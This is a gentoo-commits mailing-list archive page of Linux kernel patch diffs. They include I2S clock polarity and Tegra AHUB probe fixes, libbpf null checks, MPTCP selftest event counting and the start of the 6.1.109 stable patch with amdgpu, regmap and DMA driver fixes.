+-	regmap_update_bits(i2s->regmap, SUN4I_I2S_FMT0_REG,
+-			   SUN8I_I2S_FMT0_LRCLK_POLARITY_MASK |
+-			   SUN8I_I2S_FMT0_BCLK_POLARITY_MASK,
+-			   val);
+-
+ 	/* DAI Mode */
+ 	switch (fmt & SND_SOC_DAIFMT_FORMAT_MASK) {
+ 	case SND_SOC_DAIFMT_DSP_A:
++		lrclk_pol = SUN8I_I2S_FMT0_LRCLK_POLARITY_START_HIGH;
+ 		mode = SUN8I_I2S_CTRL_MODE_PCM;
+ 		offset = 1;
+ 		break;
+ 
+ 	case SND_SOC_DAIFMT_DSP_B:
++		lrclk_pol = SUN8I_I2S_FMT0_LRCLK_POLARITY_START_HIGH;
+ 		mode = SUN8I_I2S_CTRL_MODE_PCM;
+ 		offset = 0;
+ 		break;
+ 
+ 	case SND_SOC_DAIFMT_I2S:
++		lrclk_pol = SUN8I_I2S_FMT0_LRCLK_POLARITY_START_LOW;
+ 		mode = SUN8I_I2S_CTRL_MODE_LEFT;
+ 		offset = 1;
+ 		break;
+ 
+ 	case SND_SOC_DAIFMT_LEFT_J:
++		lrclk_pol = SUN8I_I2S_FMT0_LRCLK_POLARITY_START_HIGH;
+ 		mode = SUN8I_I2S_CTRL_MODE_LEFT;
+ 		offset = 0;
+ 		break;
+ 
+ 	case SND_SOC_DAIFMT_RIGHT_J:
++		lrclk_pol = SUN8I_I2S_FMT0_LRCLK_POLARITY_START_HIGH;
+ 		mode = SUN8I_I2S_CTRL_MODE_RIGHT;
+ 		offset = 0;
+ 		break;
+@@ -910,6 +883,36 @@ static int sun50i_h6_i2s_set_soc_fmt(const struct sun4i_i2s *i2s,
+ 			   SUN50I_H6_I2S_TX_CHAN_SEL_OFFSET_MASK,
+ 			   SUN50I_H6_I2S_TX_CHAN_SEL_OFFSET(offset));
+ 
++	/* DAI clock polarity */
++	bclk_pol = SUN8I_I2S_FMT0_BCLK_POLARITY_NORMAL;
++
++	switch (fmt & SND_SOC_DAIFMT_INV_MASK) {
++	case SND_SOC_DAIFMT_IB_IF:
++		/* Invert both clocks */
++		lrclk_pol ^= SUN8I_I2S_FMT0_LRCLK_POLARITY_MASK;
++		bclk_pol = SUN8I_I2S_FMT0_BCLK_POLARITY_INVERTED;
++		break;
++	case SND_SOC_DAIFMT_IB_NF:
++		/* Invert bit clock */
++		bclk_pol = SUN8I_I2S_FMT0_BCLK_POLARITY_INVERTED;
++		break;
++	case SND_SOC_DAIFMT_NB_IF:
++		/* Invert frame clock */
++		lrclk_pol ^= SUN8I_I2S_FMT0_LRCLK_POLARITY_MASK;
++		break;
++	case SND_SOC_DAIFMT_NB_NF:
++		/* No inversion */
++		break;
++	default:
++		return -EINVAL;
++	}
++
++	regmap_update_bits(i2s->regmap, SUN4I_I2S_FMT0_REG,
++			   SUN8I_I2S_FMT0_LRCLK_POLARITY_MASK |
++			   SUN8I_I2S_FMT0_BCLK_POLARITY_MASK,
++			   lrclk_pol | bclk_pol);
++
++
+ 	/* DAI clock master masks */
+ 	switch (fmt & SND_SOC_DAIFMT_CLOCK_PROVIDER_MASK) {
+ 	case SND_SOC_DAIFMT_BP_FP:
+diff --git a/sound/soc/tegra/tegra210_ahub.c b/sound/soc/tegra/tegra210_ahub.c
+index b38d205b69cc2..dfdcb4580cd75 100644
+--- a/sound/soc/tegra/tegra210_ahub.c
++++ b/sound/soc/tegra/tegra210_ahub.c
+@@ -2,7 +2,7 @@
+ //
+ // tegra210_ahub.c - Tegra210 AHUB driver
+ //
+-// Copyright (c) 2020-2022, NVIDIA CORPORATION.  All rights reserved.
++// Copyright (c) 2020-2024, NVIDIA CORPORATION.  All rights reserved.
+ 
+ #include <linux/clk.h>
+ #include <linux/device.h>
+@@ -1401,11 +1401,13 @@ static int tegra_ahub_probe(struct platform_device *pdev)
+ 		return err;
+ 	}
+ 
++	pm_runtime_enable(&pdev->dev);
++
+ 	err = of_platform_populate(pdev->dev.of_node, NULL, NULL, &pdev->dev);
+-	if (err)
++	if (err) {
++		pm_runtime_disable(&pdev->dev);
+ 		return err;
+-
+-	pm_runtime_enable(&pdev->dev);
++	}
+ 
+ 	return 0;
+ }
+diff --git a/tools/lib/bpf/libbpf.c b/tools/lib/bpf/libbpf.c
+index bb27dfd6b97a7..878f05a424218 100644
+--- a/tools/lib/bpf/libbpf.c
++++ b/tools/lib/bpf/libbpf.c
+@@ -9364,7 +9364,7 @@ __bpf_map__iter(const struct bpf_map *m, const struct bpf_object *obj, int i)
+ struct bpf_map *
+ bpf_object__next_map(const struct bpf_object *obj, const struct bpf_map *prev)
+ {
+-	if (prev == NULL)
++	if (prev == NULL && obj != NULL)
+ 		return obj->maps;
+ 
+ 	return __bpf_map__iter(prev, obj, 1);
+@@ -9373,7 +9373,7 @@ bpf_object__next_map(const struct bpf_object *obj, const struct bpf_map *prev)
+ struct bpf_map *
+ bpf_object__prev_map(const struct bpf_object *obj, const struct bpf_map *next)
+ {
+-	if (next == NULL) {
++	if (next == NULL && obj != NULL) {
+ 		if (!obj->nr_maps)
+ 			return NULL;
+ 		return obj->maps + obj->nr_maps - 1;
+diff --git a/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c b/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c
+index 890a8236a8ba7..2809f9a25c433 100644
+--- a/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c
++++ b/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c
+@@ -28,9 +28,11 @@ static int check_vgem(int fd)
+ 	version.name = name;
+ 
+ 	ret = ioctl(fd, DRM_IOCTL_VERSION, &version);
+-	if (ret)
++	if (ret || version.name_len != 4)
+ 		return 0;
+ 
++	name[4] = '\0';
++
+ 	return !strcmp(name, "vgem");
+ }
+ 
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index 33c002c26604d..446b8daa23e07 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -394,6 +394,25 @@ reset_with_fail()
+ 	fi
+ }
+ 
++start_events()
++{
++	evts_ns1=$(mktemp)
++	evts_ns2=$(mktemp)
++	:> "$evts_ns1"
++	:> "$evts_ns2"
++	ip netns exec "${ns1}" ./pm_nl_ctl events >> "$evts_ns1" 2>&1 &
++	evts_ns1_pid=$!
++	ip netns exec "${ns2}" ./pm_nl_ctl events >> "$evts_ns2" 2>&1 &
++	evts_ns2_pid=$!
++}
++
++reset_with_events()
++{
++	reset "${1}" || return 1
++
++	start_events
++}
++
+ reset_with_tcp_filter()
+ {
+ 	reset "${1}" || return 1
+@@ -596,6 +615,14 @@ kill_tests_wait()
+ 	wait
+ }
+ 
++kill_events_pids()
++{
++	kill_wait $evts_ns1_pid
++	evts_ns1_pid=0
++	kill_wait $evts_ns2_pid
++	evts_ns2_pid=0
++}
++
+ pm_nl_set_limits()
+ {
+ 	local ns=$1
+@@ -3143,6 +3170,32 @@ fail_tests()
+ 	fi
+ }
+ 
++# $1: ns ; $2: event type ; $3: count
++chk_evt_nr()
++{
++	local ns=${1}
++	local evt_name="${2}"
++	local exp="${3}"
++
++	local evts="${evts_ns1}"
++	local evt="${!evt_name}"
++	local count
++
++	evt_name="${evt_name:16}" # without MPTCP_LIB_EVENT_
++	[ "${ns}" == "ns2" ] && evts="${evts_ns2}"
++
++	printf "%-${nr_blank}s %s" " " "event ${ns} ${evt_name} (${exp})"
++
++	count=$(grep -cw "type:${evt}" "${evts}")
++	if [ "${count}" != "${exp}" ]; then
++		echo "[fail] got $count events, expected $exp"
++		fail_test
++		dump_stats
++	else
++		echo "[ ok ]"
++	fi
++}
++
+ userspace_tests()
+ {
+ 	# userspace pm type prevents add_addr
+@@ -3236,75 +3289,6 @@ userspace_tests()
+ 		chk_join_nr 1 1 1
+ 		chk_rm_nr 0 1
+ 	fi
+-
+-	# remove and re-add
+-	if reset "delete re-add signal" &&
+-	   mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
+-		pm_nl_set_limits $ns1 0 3
+-		pm_nl_set_limits $ns2 3 3
+-		pm_nl_add_endpoint $ns1 10.0.2.1 id 1 flags signal
+-		# broadcast IP: no packet for this address will be received on ns1
+-		pm_nl_add_endpoint $ns1 224.0.0.1 id 2 flags signal
+-		pm_nl_add_endpoint $ns1 10.0.1.1 id 42 flags signal
+-		run_tests $ns1 $ns2 10.0.1.1 4 0 0 speed_20 2>/dev/null &
+-		local tests_pid=$!
+-
+-		wait_mpj $ns2
+-		chk_subflow_nr needtitle "before delete" 2
+-
+-		pm_nl_del_endpoint $ns1 1 10.0.2.1
+-		pm_nl_del_endpoint $ns1 2 224.0.0.1
+-		sleep 0.5
+-		chk_subflow_nr "" "after delete" 1
+-
+-		pm_nl_add_endpoint $ns1 10.0.2.1 id 1 flags signal
+-		pm_nl_add_endpoint $ns1 10.0.3.1 id 2 flags signal
+-		wait_mpj $ns2
+-		chk_subflow_nr "" "after re-add" 3
+-
+-		pm_nl_del_endpoint $ns1 42 10.0.1.1
+-		sleep 0.5
+-		chk_subflow_nr "" "after delete ID 0" 2
+-
+-		pm_nl_add_endpoint $ns1 10.0.1.1 id 99 flags signal
+-		wait_mpj $ns2
+-		chk_subflow_nr "" "after re-add" 3
+-		kill_tests_wait
+-
+-		chk_join_nr 4 4 4
+-		chk_add_nr 5 5
+-		chk_rm_nr 3 2 invert
+-	fi
+-
+-	# flush and re-add
+-	if reset_with_tcp_filter "flush re-add" ns2 10.0.3.2 REJECT OUTPUT &&
+-	   mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
+-		pm_nl_set_limits $ns1 0 2
+-		pm_nl_set_limits $ns2 1 2
+-		# broadcast IP: no packet for this address will be received on ns1
+-		pm_nl_add_endpoint $ns1 224.0.0.1 id 2 flags signal
+-		pm_nl_add_endpoint $ns2 10.0.3.2 id 3 flags subflow
+-		run_tests $ns1 $ns2 10.0.1.1 4 0 0 speed_20 2>/dev/null &
+-		local tests_pid=$!
+-
+-		wait_attempt_fail $ns2
+-		chk_subflow_nr needtitle "before flush" 1
+-
+-		pm_nl_flush_endpoint $ns2
+-		pm_nl_flush_endpoint $ns1
+-		wait_rm_addr $ns2 0
+-		ip netns exec "${ns2}" ${iptables} -D OUTPUT -s "10.0.3.2" -p tcp -j REJECT
+-		pm_nl_add_endpoint $ns2 10.0.3.2 id 3 flags subflow
+-		wait_mpj $ns2
+-		pm_nl_add_endpoint $ns1 10.0.3.1 id 2 flags signal
+-		wait_mpj $ns2
+-		kill_wait "${tests_pid}"
+-		kill_tests_wait
+-
+-		chk_join_nr 2 2 2
+-		chk_add_nr 2 2
+-		chk_rm_nr 1 0 invert
+-	fi
+ }
+ 
+ endpoint_tests()
+@@ -3334,11 +3318,13 @@ endpoint_tests()
+ 
+ 	if reset_with_tcp_filter "delete and re-add" ns2 10.0.3.2 REJECT OUTPUT &&
+ 	   mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
++		start_events
+ 		pm_nl_set_limits $ns1 0 3
+ 		pm_nl_set_limits $ns2 0 3
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 id 1 dev ns2eth1 flags subflow
+ 		pm_nl_add_endpoint $ns2 10.0.2.2 id 2 dev ns2eth2 flags subflow
+ 		run_tests $ns1 $ns2 10.0.1.1 4 0 0 speed_5 2>/dev/null &
++		local tests_pid=$!
+ 
+ 		wait_mpj $ns2
+ 		pm_nl_del_endpoint $ns2 2 10.0.2.2
+@@ -3370,11 +3356,121 @@ endpoint_tests()
+ 			chk_subflow_nr "" "after re-add id 0 ($i)" 3
+ 		done
+ 
++		kill_wait "${tests_pid}"
++		kill_events_pids
+ 		kill_tests_wait
+ 
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_CREATED 1
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_ESTABLISHED 1
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_ANNOUNCED 0
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_REMOVED 4
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_SUB_ESTABLISHED 6
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_SUB_CLOSED 4
++
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_CREATED 1
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_ESTABLISHED 1
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_ANNOUNCED 0
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_REMOVED 0
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_SUB_ESTABLISHED 6
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_SUB_CLOSED 5 # one has been closed before estab
++
+ 		chk_join_nr 6 6 6
+ 		chk_rm_nr 4 4
+ 	fi
++
++	# remove and re-add
++	if reset_with_events "delete re-add signal" &&
++	   mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
++		pm_nl_set_limits $ns1 0 3
++		pm_nl_set_limits $ns2 3 3
++		pm_nl_add_endpoint $ns1 10.0.2.1 id 1 flags signal
++		# broadcast IP: no packet for this address will be received on ns1
++		pm_nl_add_endpoint $ns1 224.0.0.1 id 2 flags signal
++		pm_nl_add_endpoint $ns1 10.0.1.1 id 42 flags signal
++		run_tests $ns1 $ns2 10.0.1.1 4 0 0 speed_5 2>/dev/null &
++		local tests_pid=$!
++
++		wait_mpj $ns2
++		chk_subflow_nr needtitle "before delete" 2
++
++		pm_nl_del_endpoint $ns1 1 10.0.2.1
++		pm_nl_del_endpoint $ns1 2 224.0.0.1
++		sleep 0.5
++		chk_subflow_nr "" "after delete" 1
++
++		pm_nl_add_endpoint $ns1 10.0.2.1 id 1 flags signal
++		pm_nl_add_endpoint $ns1 10.0.3.1 id 2 flags signal
++		wait_mpj $ns2
++		chk_subflow_nr "" "after re-add" 3
++
++		pm_nl_del_endpoint $ns1 42 10.0.1.1
++		sleep 0.5
++		chk_subflow_nr "" "after delete ID 0" 2
++
++		pm_nl_add_endpoint $ns1 10.0.1.1 id 99 flags signal
++		wait_mpj $ns2
++		chk_subflow_nr "" "after re-add ID 0" 3
++
++		pm_nl_del_endpoint $ns1 99 10.0.1.1
++		sleep 0.5
++		chk_subflow_nr "" "after re-delete ID 0" 2
++
++		pm_nl_add_endpoint $ns1 10.0.1.1 id 88 flags signal
++		wait_mpj $ns2
++		chk_subflow_nr "" "after re-re-add ID 0" 3
++
++		kill_wait "${tests_pid}"
++		kill_events_pids
++		kill_tests_wait
++
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_CREATED 1
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_ESTABLISHED 1
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_ANNOUNCED 0
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_REMOVED 0
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_SUB_ESTABLISHED 5
++		chk_evt_nr ns1 MPTCP_LIB_EVENT_SUB_CLOSED 3
++
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_CREATED 1
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_ESTABLISHED 1
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_ANNOUNCED 6
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_REMOVED 4
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_SUB_ESTABLISHED 5
++		chk_evt_nr ns2 MPTCP_LIB_EVENT_SUB_CLOSED 3
++
++		chk_join_nr 5 5 5
++		chk_add_nr 6 6
++		chk_rm_nr 4 3 invert
++	fi
++
++	# flush and re-add
++	if reset_with_tcp_filter "flush re-add" ns2 10.0.3.2 REJECT OUTPUT &&
++	   mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
++		pm_nl_set_limits $ns1 0 2
++		pm_nl_set_limits $ns2 1 2
++		# broadcast IP: no packet for this address will be received on ns1
++		pm_nl_add_endpoint $ns1 224.0.0.1 id 2 flags signal
++		pm_nl_add_endpoint $ns2 10.0.3.2 id 3 flags subflow
++		run_tests $ns1 $ns2 10.0.1.1 4 0 0 speed_20 2>/dev/null &
++		local tests_pid=$!
++
++		wait_attempt_fail $ns2
++		chk_subflow_nr needtitle "before flush" 1
++
++		pm_nl_flush_endpoint $ns2
++		pm_nl_flush_endpoint $ns1
++		wait_rm_addr $ns2 0
++		ip netns exec "${ns2}" ${iptables} -D OUTPUT -s "10.0.3.2" -p tcp -j REJECT
++		pm_nl_add_endpoint $ns2 10.0.3.2 id 3 flags subflow
++		wait_mpj $ns2
++		pm_nl_add_endpoint $ns1 10.0.3.1 id 2 flags signal
++		wait_mpj $ns2
++		kill_wait "${tests_pid}"
++		kill_tests_wait
++
++		chk_join_nr 2 2 2
++		chk_add_nr 2 2
++		chk_rm_nr 1 0 invert
++	fi
+ }
+ 
+ # [$1: error message]
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_lib.sh b/tools/testing/selftests/net/mptcp/mptcp_lib.sh
+index f32045b23b893..4b1bef34d6d8c 100644
+--- a/tools/testing/selftests/net/mptcp/mptcp_lib.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_lib.sh
+@@ -4,6 +4,21 @@
+ readonly KSFT_FAIL=1
+ readonly KSFT_SKIP=4
+ 
++# These variables are used in some selftests, read-only
++declare -rx MPTCP_LIB_EVENT_CREATED=1           # MPTCP_EVENT_CREATED
++declare -rx MPTCP_LIB_EVENT_ESTABLISHED=2       # MPTCP_EVENT_ESTABLISHED
++declare -rx MPTCP_LIB_EVENT_CLOSED=3            # MPTCP_EVENT_CLOSED
++declare -rx MPTCP_LIB_EVENT_ANNOUNCED=6         # MPTCP_EVENT_ANNOUNCED
++declare -rx MPTCP_LIB_EVENT_REMOVED=7           # MPTCP_EVENT_REMOVED
++declare -rx MPTCP_LIB_EVENT_SUB_ESTABLISHED=10  # MPTCP_EVENT_SUB_ESTABLISHED
++declare -rx MPTCP_LIB_EVENT_SUB_CLOSED=11       # MPTCP_EVENT_SUB_CLOSED
++declare -rx MPTCP_LIB_EVENT_SUB_PRIORITY=13     # MPTCP_EVENT_SUB_PRIORITY
++declare -rx MPTCP_LIB_EVENT_LISTENER_CREATED=15 # MPTCP_EVENT_LISTENER_CREATED
++declare -rx MPTCP_LIB_EVENT_LISTENER_CLOSED=16  # MPTCP_EVENT_LISTENER_CLOSED
++
++declare -rx MPTCP_LIB_AF_INET=2
++declare -rx MPTCP_LIB_AF_INET6=10
++
+ # SELFTESTS_MPTCP_LIB_EXPECT_ALL_FEATURES env var can be set when validating all
+ # features using the last version of the kernel and the selftests to make sure
+ # a test is not being skipped by mistake.


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-09-08 11:06 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-09-08 11:06 UTC (permalink / raw
  To: gentoo-commits

commit:     e5dea1f743963e97a7691f9dda600439eaf3c4ad
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Sep  8 11:06:33 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Sep  8 11:06:33 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=e5dea1f7

Linux patch 6.1.109

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |    4 +
 1108_linux-6.1.109.patch | 4628 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 4632 insertions(+)

diff --git a/0000_README b/0000_README
index 06b1b356..2deab4a3 100644
--- a/0000_README
+++ b/0000_README
@@ -479,6 +479,10 @@ Patch:  1107_linux-6.1.108.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.108
 
+Patch:  1108_linux-6.1.109.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.109
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1108_linux-6.1.109.patch b/1108_linux-6.1.109.patch
new file mode 100644
index 00000000..f282b587
--- /dev/null
+++ b/1108_linux-6.1.109.patch
@@ -0,0 +1,4628 @@
+diff --git a/Documentation/locking/hwspinlock.rst b/Documentation/locking/hwspinlock.rst
+index 6f03713b70039..2ffaa3cbd63f1 100644
+--- a/Documentation/locking/hwspinlock.rst
++++ b/Documentation/locking/hwspinlock.rst
+@@ -85,6 +85,17 @@ is already free).
+ 
+ Should be called from a process context (might sleep).
+ 
++::
++
++  int hwspin_lock_bust(struct hwspinlock *hwlock, unsigned int id);
++
++After verifying the owner of the hwspinlock, release a previously acquired
++hwspinlock; returns 0 on success, or an appropriate error code on failure
++(e.g. -EOPNOTSUPP if the bust operation is not defined for the specific
++hwspinlock).
++
++Should be called from a process context (might sleep).
++
+ ::
+ 
+   int hwspin_lock_timeout(struct hwspinlock *hwlock, unsigned int timeout);
+diff --git a/Makefile b/Makefile
+index 4813b751ccb0d..59c1ac88c57d9 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 108
++SUBLEVEL = 109
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/block/blk-integrity.c b/block/blk-integrity.c
+index 69eed260a8239..e2d88611d5bf9 100644
+--- a/block/blk-integrity.c
++++ b/block/blk-integrity.c
+@@ -431,8 +431,6 @@ void blk_integrity_unregister(struct gendisk *disk)
+ 	if (!bi->profile)
+ 		return;
+ 
+-	/* ensure all bios are off the integrity workqueue */
+-	blk_flush_integrity();
+ 	blk_queue_flag_clear(QUEUE_FLAG_STABLE_WRITES, disk->queue);
+ 	memset(bi, 0, sizeof(*bi));
+ }
+diff --git a/drivers/base/regmap/regmap-spi.c b/drivers/base/regmap/regmap-spi.c
+index 37ab23a9d0345..7f14c5ed1e229 100644
+--- a/drivers/base/regmap/regmap-spi.c
++++ b/drivers/base/regmap/regmap-spi.c
+@@ -122,8 +122,7 @@ static const struct regmap_bus *regmap_get_spi_bus(struct spi_device *spi,
+ 			return ERR_PTR(-ENOMEM);
+ 
+ 		max_msg_size = spi_max_message_size(spi);
+-		reg_reserve_size = config->reg_bits / BITS_PER_BYTE
+-				 + config->pad_bits / BITS_PER_BYTE;
++		reg_reserve_size = (config->reg_bits + config->pad_bits) / BITS_PER_BYTE;
+ 		if (max_size + reg_reserve_size > max_msg_size)
+ 			max_size -= reg_reserve_size;
+ 
+diff --git a/drivers/cpufreq/scmi-cpufreq.c b/drivers/cpufreq/scmi-cpufreq.c
+index 028df8a5f537a..079940c69ee0b 100644
+--- a/drivers/cpufreq/scmi-cpufreq.c
++++ b/drivers/cpufreq/scmi-cpufreq.c
+@@ -62,9 +62,9 @@ static unsigned int scmi_cpufreq_fast_switch(struct cpufreq_policy *policy,
+ 					     unsigned int target_freq)
+ {
+ 	struct scmi_data *priv = policy->driver_data;
++	unsigned long freq = target_freq;
+ 
+-	if (!perf_ops->freq_set(ph, priv->domain_id,
+-				target_freq * 1000, true))
++	if (!perf_ops->freq_set(ph, priv->domain_id, freq * 1000, true))
+ 		return target_freq;
+ 
+ 	return 0;
+diff --git a/drivers/dma/altera-msgdma.c b/drivers/dma/altera-msgdma.c
+index 4153c2edb0490..711e3756a39a5 100644
+--- a/drivers/dma/altera-msgdma.c
++++ b/drivers/dma/altera-msgdma.c
+@@ -233,7 +233,7 @@ static void msgdma_free_descriptor(struct msgdma_device *mdev,
+ 	struct msgdma_sw_desc *child, *next;
+ 
+ 	mdev->desc_free_cnt++;
+-	list_add_tail(&desc->node, &mdev->free_list);
++	list_move_tail(&desc->node, &mdev->free_list);
+ 	list_for_each_entry_safe(child, next, &desc->tx_list, node) {
+ 		mdev->desc_free_cnt++;
+ 		list_move_tail(&child->node, &mdev->free_list);
+@@ -583,17 +583,16 @@ static void msgdma_issue_pending(struct dma_chan *chan)
+ static void msgdma_chan_desc_cleanup(struct msgdma_device *mdev)
+ {
+ 	struct msgdma_sw_desc *desc, *next;
++	unsigned long irqflags;
+ 
+ 	list_for_each_entry_safe(desc, next, &mdev->done_list, node) {
+ 		struct dmaengine_desc_callback cb;
+ 
+-		list_del(&desc->node);
+-
+ 		dmaengine_desc_get_callback(&desc->async_tx, &cb);
+ 		if (dmaengine_desc_callback_valid(&cb)) {
+-			spin_unlock(&mdev->lock);
++			spin_unlock_irqrestore(&mdev->lock, irqflags);
+ 			dmaengine_desc_callback_invoke(&cb, NULL);
+-			spin_lock(&mdev->lock);
++			spin_lock_irqsave(&mdev->lock, irqflags);
+ 		}
+ 
+ 		/* Run any dependencies, then free the descriptor */
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_afmt.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_afmt.c
+index a4d65973bf7cf..80771b1480fff 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_afmt.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_afmt.c
+@@ -100,6 +100,7 @@ struct amdgpu_afmt_acr amdgpu_afmt_acr(uint32_t clock)
+ 	amdgpu_afmt_calc_cts(clock, &res.cts_32khz, &res.n_32khz, 32000);
+ 	amdgpu_afmt_calc_cts(clock, &res.cts_44_1khz, &res.n_44_1khz, 44100);
+ 	amdgpu_afmt_calc_cts(clock, &res.cts_48khz, &res.n_48khz, 48000);
++	res.clock = clock;
+ 
+ 	return res;
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_atombios.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_atombios.c
+index 9ba4817a91484..816014ea53817 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_atombios.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_atombios.c
+@@ -1476,6 +1476,8 @@ int amdgpu_atombios_init_mc_reg_table(struct amdgpu_device *adev,
+ 										(u32)le32_to_cpu(*((u32 *)reg_data + j));
+ 									j++;
+ 								} else if ((reg_table->mc_reg_address[i].pre_reg_data & LOW_NIBBLE_MASK) == DATA_EQU_PREV) {
++									if (i == 0)
++										continue;
+ 									reg_table->mc_reg_table_entry[num_ranges].mc_data[i] =
+ 										reg_table->mc_reg_table_entry[num_ranges].mc_data[i - 1];
+ 								}
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_cgs.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_cgs.c
+index f1a0503791905..682de88cf91f7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_cgs.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_cgs.c
+@@ -213,6 +213,9 @@ static int amdgpu_cgs_get_firmware_info(struct cgs_device *cgs_device,
+ 		struct amdgpu_firmware_info *ucode;
+ 
+ 		id = fw_type_convert(cgs_device, type);
++		if (id >= AMDGPU_UCODE_ID_MAXIMUM)
++			return -EINVAL;
++
+ 		ucode = &adev->firmware.ucode[id];
+ 		if (ucode->fw == NULL)
+ 			return -EINVAL;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 4d1c2eb63090f..1d0f6628f1d69 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -4560,7 +4560,8 @@ static int amdgpu_device_recover_vram(struct amdgpu_device *adev)
+ 		shadow = vmbo->shadow;
+ 
+ 		/* No need to recover an evicted BO */
+-		if (shadow->tbo.resource->mem_type != TTM_PL_TT ||
++		if (!shadow->tbo.resource ||
++		    shadow->tbo.resource->mem_type != TTM_PL_TT ||
+ 		    shadow->tbo.resource->start == AMDGPU_BO_INVALID_OFFSET ||
+ 		    shadow->parent->tbo.resource->mem_type != TTM_PL_VRAM)
+ 			continue;
+@@ -5390,7 +5391,7 @@ int amdgpu_device_gpu_recover(struct amdgpu_device *adev,
+ 	 * to put adev in the 1st position.
+ 	 */
+ 	INIT_LIST_HEAD(&device_list);
+-	if (!amdgpu_sriov_vf(adev) && (adev->gmc.xgmi.num_physical_nodes > 1)) {
++	if (!amdgpu_sriov_vf(adev) && (adev->gmc.xgmi.num_physical_nodes > 1) && hive) {
+ 		list_for_each_entry(tmp_adev, &hive->device_list, gmc.xgmi.head) {
+ 			list_add_tail(&tmp_adev->reset_list, &device_list);
+ 			if (gpu_reset_for_dev_remove && adev->shutdown)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.c
+index d6c4293829aab..3e4912f1f92af 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.c
+@@ -179,7 +179,7 @@ static int __amdgpu_eeprom_xfer(struct i2c_adapter *i2c_adap, u32 eeprom_addr,
+  * Returns the number of bytes read/written; -errno on error.
+  */
+ static int amdgpu_eeprom_xfer(struct i2c_adapter *i2c_adap, u32 eeprom_addr,
+-			      u8 *eeprom_buf, u16 buf_size, bool read)
++			      u8 *eeprom_buf, u32 buf_size, bool read)
+ {
+ 	const struct i2c_adapter_quirks *quirks = i2c_adap->quirks;
+ 	u16 limit;
+@@ -226,7 +226,7 @@ static int amdgpu_eeprom_xfer(struct i2c_adapter *i2c_adap, u32 eeprom_addr,
+ 
+ int amdgpu_eeprom_read(struct i2c_adapter *i2c_adap,
+ 		       u32 eeprom_addr, u8 *eeprom_buf,
+-		       u16 bytes)
++		       u32 bytes)
+ {
